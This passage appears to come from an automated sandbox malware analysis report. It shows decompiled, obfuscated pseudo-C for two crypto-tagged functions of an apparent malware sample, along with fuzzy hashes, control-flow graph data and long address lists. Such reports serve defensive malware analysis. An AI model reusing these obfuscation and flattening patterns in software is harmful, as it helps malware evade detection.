                                                                                                          • Instruction Fuzzy Hash: BA2212714097809FD7B9CF61C94AA9BBBF1FBC5708F10890CE29A96260C7B58949CF53
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF5779, Relevance: 12.9, Strings: 10, Instructions: 430COMMONCrypto
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 835 2af5779-2af5da9 call 2affe29 838 2af5db1 835->838 839 2af5db8-2af5dbe 838->839 840 2af5f67-2af5f6d 839->840 841 2af5dc4 839->841 842 2af5f73-2af5f79 840->842 843 2af6041-2af6067 call 2aefb8e 840->843 844 2af5dca-2af5dd0 841->844 845 2af5f40-2af5f62 call 2b02b09 841->845 848 2af5f7f-2af5f85 842->848 849 2af6086-2af60a5 call 2b02b09 842->849 862 2af6069-2af606e 843->862 863 2af6073 843->863 850 2af5dd6-2af5ddc 844->850 851 2af5f03-2af5f30 call 2ae57b8 844->851 845->839 854 2af5ffc-2af603c call 2afcca0 848->854 855 2af5f87-2af5f8d 848->855 870 2af60a6-2af60b7 849->870 857 2af5e3f-2af5eb2 call 2ae5026 call 2afc9b0 call 2ae71b3 850->857 858 2af5dde-2af5de4 850->858 851->870 871 2af5f36-2af5f3b 851->871 854->839 864 2af6078-2af607e 855->864 865 2af5f93-2af5fec call 2aee7de 855->865 887 2af5ec7-2af5efe call 2afcca0 857->887 888 2af5eb4-2af5ebd 857->888 867 2af5de6-2af5dec 858->867 868 2af5e35-2af5e3a 858->868 862->839 863->864 864->839 873 2af6084 864->873 865->870 881 2af5ff2-2af5ff7 865->881 867->864 875 2af5df2-2af5e1a call 2aec5d8 867->875 868->839 871->839 873->870 884 2af5e2e-2af5e33 875->884 885 2af5e1c-2af5e2c 875->885 881->839 884->839 885->839 887->838 889 2af5ebf 888->889 890 2af5ec2-2af5ec5 888->890 889->890 890->887 890->888
                                                                                                          C-Code - Quality: 92%
                                                                                                          			E02AF5779(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v32;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v88;
				char _v92;
				char _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				unsigned int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				unsigned int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				unsigned int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				void* _t410;
				void* _t455;
				void* _t464;
				intOrPtr _t469;
				void* _t475;
				intOrPtr* _t477;
				void* _t479;
				signed int _t492;
				signed char* _t519;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed char* _t532;
				intOrPtr _t533;
				intOrPtr _t534;
				void* _t535;
				signed char* _t536;
				intOrPtr* _t537;
				signed int* _t539;
				signed int* _t541;
				void* _t543;

				_t477 = _a12;
				_push(_t477);
				_push(_a8);
				_t533 = __edx;
				_t537 = __ecx;
				_push(_a4);
				_v104 = __edx;
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t410);
				_v48 = 0xc2c967;
				_v108 = _v108 & 0x00000000;
				asm("stosd");
				_t539 =  &(( &_v288)[5]);
				_t479 = 0x2d8a01e;
				asm("stosd");
				asm("stosd");
				_v268 = 0x13192e;
				_v268 = _v268 >> 0xe;
				_t522 = 0x7a;
				_v268 = _v268 / _t522;
				_v268 = _v268 ^ 0xa67107cf;
				_v268 = _v268 ^ 0xa67107cf;
				_v180 = 0x822106;
				_v180 = _v180 ^ 0x7b43f696;
				_v180 = _v180 ^ 0xd3ff461a;
				_v180 = _v180 ^ 0xa83e91ca;
				_v260 = 0xfc96b3;
				_v260 = _v260 ^ 0x88d779ee;
				_v260 = _v260 | 0x0ca97313;
				_v260 = _v260 ^ 0xca187f30;
				_v260 = _v260 ^ 0x46b3802f;
				_v288 = 0x4333cc;
				_v288 = _v288 << 0xf;
				_t523 = 0x34;
				_v288 = _v288 / _t523;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x005b8977;
				_v136 = 0xc5dc93;
				_v136 = _v136 * 0xc;
				_v136 = _v136 ^ 0x0945f62e;
				_v128 = 0x6b700a;
				_t57 =  &_v128; // 0x6b700a
				_v128 =  *_t57 * 0x15;
				_v128 = _v128 ^ 0x08d49145;
				_v232 = 0xf79846;
				_v232 = _v232 ^ 0xca57ef9e;
				_v232 = _v232 ^ 0x925d174a;
				_v232 = _v232 ^ 0x58faffd4;
				_v280 = 0xd1aac6;
				_v280 = _v280 >> 0xc;
				_v280 = _v280 >> 3;
				_v280 = _v280 | 0xe15f3d77;
				_v280 = _v280 ^ 0xe1581caf;
				_v204 = 0x586478;
				_v204 = _v204 << 6;
				_v204 = _v204 * 0x45;
				_v204 = _v204 ^ 0xf4c06de0;
				_v236 = 0x7a6b49;
				_v236 = _v236 + 0xfffff53d;
				_v236 = _v236 + 0xffff6bfb;
				_v236 = _v236 ^ 0x00796dc4;
				_v164 = 0x73b924;
				_v164 = _v164 * 0x37;
				_v164 = _v164 ^ 0x18d89939;
				_v140 = 0xd61f2b;
				_v140 = _v140 | 0xe12df20d;
				_v140 = _v140 ^ 0xe1fed234;
				_v264 = 0xb74ee;
				_v264 = _v264 | 0x369c0611;
				_v264 = _v264 + 0xffffce97;
				_v264 = _v264 | 0x56131c90;
				_v264 = _v264 ^ 0x76993c7a;
				_v188 = 0x86359d;
				_v188 = _v188 | 0xee9d04be;
				_v188 = _v188 >> 7;
				_v188 = _v188 ^ 0x01d63d7e;
				_v196 = 0x62a6bf;
				_v196 = _v196 ^ 0x13f7b83b;
				_v196 = _v196 | 0xfa5dbf29;
				_v196 = _v196 ^ 0xfbd613bb;
				_v272 = 0x497fb9;
				_v272 = _v272 >> 8;
				_v272 = _v272 + 0x46f;
				_t524 = 0x15;
				_v272 = _v272 / _t524;
				_v272 = _v272 ^ 0x0006a64c;
				_v284 = 0x22ff47;
				_v284 = _v284 << 9;
				_v284 = _v284 + 0x2a7e;
				_v284 = _v284 | 0xa3b8d71b;
				_v284 = _v284 ^ 0xe7f75fc1;
				_v168 = 0x5effde;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0xdff336ff;
				_v160 = 0x143f18;
				_v160 = _v160 >> 8;
				_v160 = _v160 ^ 0x00026d5e;
				_v212 = 0x56f8ef;
				_t525 = 0x74;
				_v212 = _v212 / _t525;
				_v212 = _v212 >> 1;
				_v212 = _v212 ^ 0x00041781;
				_v184 = 0x78f661;
				_t526 = 0x24;
				_v184 = _v184 / _t526;
				_v184 = _v184 << 6;
				_v184 = _v184 ^ 0x00d4b0ae;
				_v132 = 0xfc57e1;
				_v132 = _v132 + 0x95ac;
				_v132 = _v132 ^ 0x00fd4e4f;
				_v224 = 0x75249d;
				_v224 = _v224 >> 2;
				_v224 = _v224 << 5;
				_v224 = _v224 ^ 0x03a0d1e2;
				_v200 = 0x1dd68f;
				_t527 = 0x1e;
				_v200 = _v200 / _t527;
				_v200 = _v200 << 5;
				_v200 = _v200 ^ 0x001cc6a7;
				_v192 = 0xfcdaf1;
				_v192 = _v192 + 0xd795;
				_v192 = _v192 >> 9;
				_v192 = _v192 ^ 0x00058c90;
				_v216 = 0xbb9259;
				_t528 = 0x34;
				_v216 = _v216 / _t528;
				_t529 = 0x52;
				_v216 = _v216 * 0x13;
				_v216 = _v216 ^ 0x004a95ed;
				_v276 = 0x57a41b;
				_v276 = _v276 ^ 0xd020dbe5;
				_v276 = _v276 | 0x8ab5e016;
				_v276 = _v276 + 0xffff22d9;
				_v276 = _v276 ^ 0xdaf55aee;
				_v244 = 0x1f39e;
				_v244 = _v244 >> 7;
				_v244 = _v244 | 0x3f4cee99;
				_v244 = _v244 / _t529;
				_v244 = _v244 ^ 0x00c55e53;
				_v208 = 0x8cb9ec;
				_v208 = _v208 ^ 0x591dda69;
				_v208 = _v208 + 0xffff44b3;
				_v208 = _v208 ^ 0x5993fa0d;
				_v152 = 0xb0343f;
				_v152 = _v152 << 0xf;
				_v152 = _v152 ^ 0x1a1cc008;
				_v252 = 0xe1a21c;
				_v252 = _v252 | 0x952b17c7;
				_v252 = _v252 >> 0xb;
				_v252 = _v252 + 0x3107;
				_v252 = _v252 ^ 0x00168178;
				_v176 = 0x1f45f4;
				_v176 = _v176 + 0xffffb6c3;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x000294fa;
				_v144 = 0xd98b7;
				_v144 = _v144 + 0xdfca;
				_v144 = _v144 ^ 0x00064cf8;
				_v124 = 0xf97c3c;
				_v124 = _v124 << 0xe;
				_v124 = _v124 ^ 0x5f01afd1;
				_v220 = 0xbf67e3;
				_v220 = _v220 >> 0xf;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0002d002;
				_v148 = 0xfa1be7;
				_v148 = _v148 * 0x4c;
				_v148 = _v148 ^ 0x4a419838;
				_v228 = 0xe7473d;
				_v228 = _v228 + 0x3507;
				_v228 = _v228 ^ 0x00ead38c;
				_v156 = 0x66a8ab;
				_v156 = _v156 | 0x79d54c9c;
				_v156 = _v156 ^ 0x79fe3884;
				_v240 = 0x18be1a;
				_v240 = _v240 ^ 0x7e543587;
				_v240 = _v240 * 0x68;
				_v240 = _v240 | 0xe3fcfdd3;
				_v240 = _v240 ^ 0xeff94d70;
				_v172 = 0x9913c4;
				_v172 = _v172 * 0x77;
				_v172 = _v172 + 0xffffc63d;
				_v172 = _v172 ^ 0x47206855;
				_v248 = 0xd44183;
				_v248 = _v248 + 0xd298;
				_v248 = _v248 << 4;
				_v248 = _v248 ^ 0x50766a5f;
				_v248 = _v248 ^ 0x5d272bff;
				_v256 = 0x31eb30;
				_v256 = _v256 ^ 0xb25f58d4;
				_v256 = _v256 ^ 0x46bb6998;
				_t530 = 0x74;
				_v256 = _v256 / _t530;
				_v256 = _v256 ^ 0x021c5309;
				while(1) {
					L1:
					_t531 = _v120;
					goto L2;
					do {
						while(1) {
							L2:
							_t543 = _t479 - 0x3286a26;
							if(_t543 > 0) {
								break;
							}
							if(_t543 == 0) {
								E02B02B09(_v220, _v116, _v148, _v228);
								_t479 = 0x483cb7c;
								continue;
							}
							if(_t479 == 0xd18f0a) {
								_t455 = E02AE57B8( *_t477, _v288, _v136,  *((intOrPtr*)(_t477 + 4)), _v128,  &_v32, _v232);
								_t539 =  &(_t539[6]);
								if(_t455 == 0) {
									L33:
									return _v108;
								}
								_t479 = 0x98446cf;
								continue;
							}
							if(_t479 == 0x2686f46) {
								_t534 =  *_t537;
								E02AE5026(_v184, _v132, _v224, _t534, _v200);
								_t535 = _t534 + _v260;
								E02AFC9B0(_v192, _t535, _v216, _v112, _v116, _v276);
								_push(_v152);
								_t536 = _t535 + _v112;
								_t492 = _t531;
								_push(_v208);
								_push(_t536);
								E02AE71B3(_t492, _v244);
								_t532 =  &(_t536[_t531]);
								_t541 =  &(_t539[0xa]);
								_t519 = _t536;
								if(_t536 >= _t532) {
									L16:
									_push(_t492);
									_push(_t492);
									_t464 = E02AFCCA0(0, 0xe);
									_t539 =  &(_t541[4]);
									_t479 = 0x3286a26;
									 *((char*)(_t464 + _t536)) = 0;
									_t533 = _v104;
									goto L1;
								} else {
									goto L13;
								}
								do {
									L13:
									_t492 = _v268;
									if(( *_t519 & 0x000000ff) == _t492) {
										 *_t519 = 0xc3;
									}
									_t519 =  &(_t519[1]);
								} while (_t519 < _t532);
								goto L16;
							}
							if(_t479 == 0x2d8a01e) {
								_t479 = 0xd18f0a;
								continue;
							}
							if(_t479 != 0x3056d50) {
								goto L30;
							}
							_push(_t479);
							_push(_t479);
							_t469 = E02AEC5D8(_a4);
							_t539 =  &(_t539[3]);
							 *_t537 = _t469;
							if(_t469 == 0) {
								_t479 = 0x3286a26;
							} else {
								_v108 = 1;
								_t479 = 0x2686f46;
							}
						}
						if(_t479 == 0x34d1508) {
							if(E02AEFB8E(_v164,  &_v100,  &_v116, _v140) == 0) {
								_t479 = 0x483cb7c;
								goto L30;
							}
							_t479 = 0x5c08967;
							goto L2;
						}
						if(_t479 == 0x483cb7c) {
							E02B02B09(_v156, _v100, _v240, _v172);
							goto L33;
						}
						if(_t479 == 0x5c08967) {
							_push(_t479);
							_push(_t479);
							_t531 = E02AFCCA0(_v248, _v256);
							_t539 =  &(_t539[4]);
							_t479 = 0x3056d50;
							_v120 = _t531;
							_a4 = _v180 + _t531 + _v112;
							goto L2;
						}
						if(_t479 != 0x98446cf) {
							goto L30;
						}
						_v92 =  &_v32;
						_v68 =  *_t477;
						_v64 =  *((intOrPtr*)(_t477 + 4));
						_v60 = _t533;
						_v88 = 0x20;
						_t475 = E02AEE7DE(_v280, _v204,  &_v92,  &_v100, _v236);
						_t539 =  &(_t539[3]);
						if(_t475 == 0) {
							goto L33;
						}
						_t479 = 0x34d1508;
						goto L2;
						L30:
					} while (_t479 != 0x5241bf8);
					goto L33;
				}
			}























































































                                                                                                          0x02af5780
                                                                                                          0x02af578a
                                                                                                          0x02af578b
                                                                                                          0x02af5792
                                                                                                          0x02af5794
                                                                                                          0x02af5796
                                                                                                          0x02af579d
                                                                                                          0x02af57a4
                                                                                                          0x02af57a5
                                                                                                          0x02af57a6
                                                                                                          0x02af57ab
                                                                                                          0x02af57bf
                                                                                                          0x02af57c7
                                                                                                          0x02af57c8
                                                                                                          0x02af57cd
                                                                                                          0x02af57d2
                                                                                                          0x02af57d5
                                                                                                          0x02af57d6
                                                                                                          0x02af57de
                                                                                                          0x02af57e7
                                                                                                          0x02af57ec
                                                                                                          0x02af57f7
                                                                                                          0x02af57fb
                                                                                                          0x02af57ff
                                                                                                          0x02af580a
                                                                                                          0x02af5815
                                                                                                          0x02af5820
                                                                                                          0x02af582b
                                                                                                          0x02af5833
                                                                                                          0x02af583b
                                                                                                          0x02af5843
                                                                                                          0x02af584b
                                                                                                          0x02af5853
                                                                                                          0x02af585b
                                                                                                          0x02af5864
                                                                                                          0x02af5867
                                                                                                          0x02af586b
                                                                                                          0x02af5870
                                                                                                          0x02af5878
                                                                                                          0x02af588b
                                                                                                          0x02af5892
                                                                                                          0x02af589d
                                                                                                          0x02af58a8
                                                                                                          0x02af58b0
                                                                                                          0x02af58b7
                                                                                                          0x02af58c2
                                                                                                          0x02af58ca
                                                                                                          0x02af58d2
                                                                                                          0x02af58da
                                                                                                          0x02af58e2
                                                                                                          0x02af58ea
                                                                                                          0x02af58ef
                                                                                                          0x02af58f4
                                                                                                          0x02af58fc
                                                                                                          0x02af5904
                                                                                                          0x02af590c
                                                                                                          0x02af5916
                                                                                                          0x02af591a
                                                                                                          0x02af5922
                                                                                                          0x02af592a
                                                                                                          0x02af5932
                                                                                                          0x02af593a
                                                                                                          0x02af5942
                                                                                                          0x02af5955
                                                                                                          0x02af595e
                                                                                                          0x02af5969
                                                                                                          0x02af5974
                                                                                                          0x02af597f
                                                                                                          0x02af598a
                                                                                                          0x02af5992
                                                                                                          0x02af599a
                                                                                                          0x02af59a2
                                                                                                          0x02af59aa
                                                                                                          0x02af59b2
                                                                                                          0x02af59ba
                                                                                                          0x02af59c2
                                                                                                          0x02af59c7
                                                                                                          0x02af59cf
                                                                                                          0x02af59d7
                                                                                                          0x02af59df
                                                                                                          0x02af59e7
                                                                                                          0x02af59ef
                                                                                                          0x02af59f7
                                                                                                          0x02af59fc
                                                                                                          0x02af5a0a
                                                                                                          0x02af5a0f
                                                                                                          0x02af5a15
                                                                                                          0x02af5a1d
                                                                                                          0x02af5a25
                                                                                                          0x02af5a2a
                                                                                                          0x02af5a32
                                                                                                          0x02af5a3a
                                                                                                          0x02af5a42
                                                                                                          0x02af5a4d
                                                                                                          0x02af5a55
                                                                                                          0x02af5a60
                                                                                                          0x02af5a6b
                                                                                                          0x02af5a73
                                                                                                          0x02af5a7e
                                                                                                          0x02af5a8a
                                                                                                          0x02af5a8f
                                                                                                          0x02af5a95
                                                                                                          0x02af5a99
                                                                                                          0x02af5aa1
                                                                                                          0x02af5aad
                                                                                                          0x02af5ab2
                                                                                                          0x02af5ab8
                                                                                                          0x02af5abd
                                                                                                          0x02af5ac5
                                                                                                          0x02af5ad0
                                                                                                          0x02af5adb
                                                                                                          0x02af5ae6
                                                                                                          0x02af5aee
                                                                                                          0x02af5af3
                                                                                                          0x02af5af8
                                                                                                          0x02af5b00
                                                                                                          0x02af5b0c
                                                                                                          0x02af5b11
                                                                                                          0x02af5b15
                                                                                                          0x02af5b1a
                                                                                                          0x02af5b22
                                                                                                          0x02af5b2a
                                                                                                          0x02af5b32
                                                                                                          0x02af5b37
                                                                                                          0x02af5b41
                                                                                                          0x02af5b4d
                                                                                                          0x02af5b52
                                                                                                          0x02af5b5d
                                                                                                          0x02af5b60
                                                                                                          0x02af5b64
                                                                                                          0x02af5b6c
                                                                                                          0x02af5b74
                                                                                                          0x02af5b7c
                                                                                                          0x02af5b84
                                                                                                          0x02af5b8c
                                                                                                          0x02af5b94
                                                                                                          0x02af5b9c
                                                                                                          0x02af5ba1
                                                                                                          0x02af5baf
                                                                                                          0x02af5bb3
                                                                                                          0x02af5bbb
                                                                                                          0x02af5bc3
                                                                                                          0x02af5bcb
                                                                                                          0x02af5bd3
                                                                                                          0x02af5bdb
                                                                                                          0x02af5be6
                                                                                                          0x02af5bee
                                                                                                          0x02af5bf9
                                                                                                          0x02af5c01
                                                                                                          0x02af5c09
                                                                                                          0x02af5c0e
                                                                                                          0x02af5c16
                                                                                                          0x02af5c1e
                                                                                                          0x02af5c29
                                                                                                          0x02af5c34
                                                                                                          0x02af5c3c
                                                                                                          0x02af5c47
                                                                                                          0x02af5c52
                                                                                                          0x02af5c5d
                                                                                                          0x02af5c68
                                                                                                          0x02af5c73
                                                                                                          0x02af5c7b
                                                                                                          0x02af5c86
                                                                                                          0x02af5c8e
                                                                                                          0x02af5c93
                                                                                                          0x02af5c98
                                                                                                          0x02af5ca0
                                                                                                          0x02af5cb3
                                                                                                          0x02af5cba
                                                                                                          0x02af5cc5
                                                                                                          0x02af5ccd
                                                                                                          0x02af5cdd
                                                                                                          0x02af5ce5
                                                                                                          0x02af5cf0
                                                                                                          0x02af5cfb
                                                                                                          0x02af5d06
                                                                                                          0x02af5d0e
                                                                                                          0x02af5d1b
                                                                                                          0x02af5d1f
                                                                                                          0x02af5d27
                                                                                                          0x02af5d2f
                                                                                                          0x02af5d42
                                                                                                          0x02af5d49
                                                                                                          0x02af5d54
                                                                                                          0x02af5d5f
                                                                                                          0x02af5d67
                                                                                                          0x02af5d6f
                                                                                                          0x02af5d74
                                                                                                          0x02af5d7c
                                                                                                          0x02af5d84
                                                                                                          0x02af5d8c
                                                                                                          0x02af5d94
                                                                                                          0x02af5da2
                                                                                                          0x02af5da5
                                                                                                          0x02af5da9
                                                                                                          0x02af5db1
                                                                                                          0x02af5db1
                                                                                                          0x02af5db1
                                                                                                          0x02af5db1
                                                                                                          0x02af5db8
                                                                                                          0x02af5db8
                                                                                                          0x02af5db8
                                                                                                          0x02af5db8
                                                                                                          0x02af5dbe
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af5dc4
                                                                                                          0x02af5f56
                                                                                                          0x02af5f5d
                                                                                                          0x00000000
                                                                                                          0x02af5f5d
                                                                                                          0x02af5dd0
                                                                                                          0x02af5f26
                                                                                                          0x02af5f2b
                                                                                                          0x02af5f30
                                                                                                          0x02af60a6
                                                                                                          0x02af60b7
                                                                                                          0x02af60b7
                                                                                                          0x02af5f36
                                                                                                          0x00000000
                                                                                                          0x02af5f36
                                                                                                          0x02af5ddc
                                                                                                          0x02af5e43
                                                                                                          0x02af5e59
                                                                                                          0x02af5e65
                                                                                                          0x02af5e86
                                                                                                          0x02af5e8b
                                                                                                          0x02af5e92
                                                                                                          0x02af5e99
                                                                                                          0x02af5e9b
                                                                                                          0x02af5ea3
                                                                                                          0x02af5ea4
                                                                                                          0x02af5ea9
                                                                                                          0x02af5eab
                                                                                                          0x02af5eae
                                                                                                          0x02af5eb2
                                                                                                          0x02af5ec7
                                                                                                          0x02af5ee0
                                                                                                          0x02af5ee1
                                                                                                          0x02af5ee6
                                                                                                          0x02af5eeb
                                                                                                          0x02af5eee
                                                                                                          0x02af5ef3
                                                                                                          0x02af5ef7
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af5eb4
                                                                                                          0x02af5eb4
                                                                                                          0x02af5eb4
                                                                                                          0x02af5ebd
                                                                                                          0x02af5ebf
                                                                                                          0x02af5ebf
                                                                                                          0x02af5ec2
                                                                                                          0x02af5ec3
                                                                                                          0x00000000
                                                                                                          0x02af5eb4
                                                                                                          0x02af5de4
                                                                                                          0x02af5e35
                                                                                                          0x00000000
                                                                                                          0x02af5e35
                                                                                                          0x02af5dec
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af5e08
                                                                                                          0x02af5e09
                                                                                                          0x02af5e0d
                                                                                                          0x02af5e12
                                                                                                          0x02af5e15
                                                                                                          0x02af5e1a
                                                                                                          0x02af5e2e
                                                                                                          0x02af5e1c
                                                                                                          0x02af5e1c
                                                                                                          0x02af5e27
                                                                                                          0x02af5e27
                                                                                                          0x02af5e1a
                                                                                                          0x02af5f6d
                                                                                                          0x02af6067
                                                                                                          0x02af6073
                                                                                                          0x00000000
                                                                                                          0x02af6073
                                                                                                          0x02af6069
                                                                                                          0x00000000
                                                                                                          0x02af6069
                                                                                                          0x02af5f79
                                                                                                          0x02af609f
                                                                                                          0x00000000
                                                                                                          0x02af60a5
                                                                                                          0x02af5f85
                                                                                                          0x02af600c
                                                                                                          0x02af600d
                                                                                                          0x02af601b
                                                                                                          0x02af601d
                                                                                                          0x02af6024
                                                                                                          0x02af602b
                                                                                                          0x02af6039
                                                                                                          0x00000000
                                                                                                          0x02af6039
                                                                                                          0x02af5f8d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af5fa6
                                                                                                          0x02af5faf
                                                                                                          0x02af5fb9
                                                                                                          0x02af5fcf
                                                                                                          0x02af5fd7
                                                                                                          0x02af5fe2
                                                                                                          0x02af5fe7
                                                                                                          0x02af5fec
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af5ff2
                                                                                                          0x00000000
                                                                                                          0x02af6078
                                                                                                          0x02af6078
                                                                                                          0x00000000
                                                                                                          0x02af6084

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: pk$ $01$=G$Ikz$Uh G$_jvP$w=_$xdX$~*
                                                                                                          • API String ID: 0-1860247402
                                                                                                          • Opcode ID: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
                                                                                                          • Instruction ID: 11974d24658e1ca6f310fc81f4b8dc75578671e111d3cf4666fb04d715a58998
                                                                                                          • Opcode Fuzzy Hash: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
                                                                                                          • Instruction Fuzzy Hash: 5F2243715093809FC3A8CF65C589A8BBBF2BFC5708F50891DE6D996260DBB48948CF43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF7D5B, Relevance: 12.9, Strings: 10, Instructions: 361COMMONCrypto
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 96%
                                                                                                          			E02AF7D5B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t420;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t488;
				void* _t489;
				signed int* _t493;

				_t493 =  &_v2792;
				_v2792 = 0x289571;
				_v2792 = _v2792 | 0xf6df9bca;
				_v2792 = _v2792 + 0xea43;
				_v2792 = _v2792 ^ 0xf7008a17;
				_v2788 = 0xdb8a78;
				_v2788 = _v2788 * 6;
				_t488 = __ecx;
				_t489 = 0x219adc7;
				_t442 = 0x7a;
				_v2788 = _v2788 / _t442;
				_t443 = 0x42;
				_v2788 = _v2788 * 0x3d;
				_v2788 = _v2788 ^ 0x0296dfb6;
				_v2660 = 0xc0a6c5;
				_v2660 = _v2660 << 6;
				_v2660 = _v2660 ^ 0x3025665c;
				_v2692 = 0x3a8fa3;
				_v2692 = _v2692 ^ 0xa120b079;
				_v2692 = _v2692 | 0x9ac88514;
				_v2692 = _v2692 ^ 0xbbd9167d;
				_v2668 = 0xec1a87;
				_v2668 = _v2668 + 0x8cab;
				_v2668 = _v2668 ^ 0x00e348c2;
				_v2628 = 0xecd9a9;
				_v2628 = _v2628 << 9;
				_v2628 = _v2628 ^ 0xd9bcc0eb;
				_v2756 = 0xbae8da;
				_v2756 = _v2756 + 0xefc;
				_v2756 = _v2756 * 0x2c;
				_v2756 = _v2756 ^ 0x76eb1803;
				_v2756 = _v2756 ^ 0x56c3d905;
				_v2780 = 0x787147;
				_v2780 = _v2780 + 0xffff6597;
				_v2780 = _v2780 + 0xffffc18b;
				_v2780 = _v2780 | 0x826dfd4e;
				_v2780 = _v2780 ^ 0x827371e5;
				_v2712 = 0x74bd84;
				_v2712 = _v2712 >> 9;
				_v2712 = _v2712 + 0xbcb6;
				_v2712 = _v2712 ^ 0x0001f6d9;
				_v2680 = 0x714a85;
				_v2680 = _v2680 | 0x3dc400c8;
				_v2680 = _v2680 ^ 0x3df5425d;
				_v2612 = 0xace488;
				_v2612 = _v2612 | 0xd2617c07;
				_v2612 = _v2612 ^ 0xd2e83d7d;
				_v2736 = 0x9a08fa;
				_v2736 = _v2736 + 0x9c03;
				_v2736 = _v2736 << 5;
				_v2736 = _v2736 ^ 0x135d006f;
				_v2652 = 0x41ccd2;
				_v2652 = _v2652 ^ 0x97b2ef27;
				_v2652 = _v2652 ^ 0x97fb61bc;
				_v2764 = 0x9e119e;
				_v2764 = _v2764 << 2;
				_v2764 = _v2764 | 0x268f2d0f;
				_v2764 = _v2764 / _t443;
				_v2764 = _v2764 ^ 0x009ccc86;
				_v2620 = 0x8f6e28;
				_v2620 = _v2620 >> 3;
				_v2620 = _v2620 ^ 0x00104951;
				_v2772 = 0xe21e14;
				_v2772 = _v2772 + 0xffff5b09;
				_v2772 = _v2772 * 0x18;
				_v2772 = _v2772 + 0xc00a;
				_v2772 = _v2772 ^ 0x152b5515;
				_v2608 = 0x3d3ea7;
				_v2608 = _v2608 + 0x63eb;
				_v2608 = _v2608 ^ 0x0030ec7d;
				_v2644 = 0x866304;
				_v2644 = _v2644 + 0x379c;
				_v2644 = _v2644 ^ 0x008e4788;
				_v2604 = 0xe77a6a;
				_t121 =  &_v2604; // 0xe77a6a
				_t444 = 0x63;
				_v2604 =  *_t121 / _t444;
				_v2604 = _v2604 ^ 0x000e0408;
				_v2696 = 0xf5199c;
				_v2696 = _v2696 << 8;
				_v2696 = _v2696 << 3;
				_v2696 = _v2696 ^ 0xa8c2da1f;
				_v2636 = 0xbfea70;
				_v2636 = _v2636 | 0x60f37e4e;
				_v2636 = _v2636 ^ 0x60f450e6;
				_v2720 = 0x6acbb3;
				_t445 = 0x6c;
				_v2720 = _v2720 / _t445;
				_v2720 = _v2720 >> 9;
				_v2720 = _v2720 ^ 0x00013488;
				_v2704 = 0x72224f;
				_v2704 = _v2704 << 9;
				_v2704 = _v2704 + 0xffff0fb2;
				_v2704 = _v2704 ^ 0xe44ad0e5;
				_v2728 = 0xe68b79;
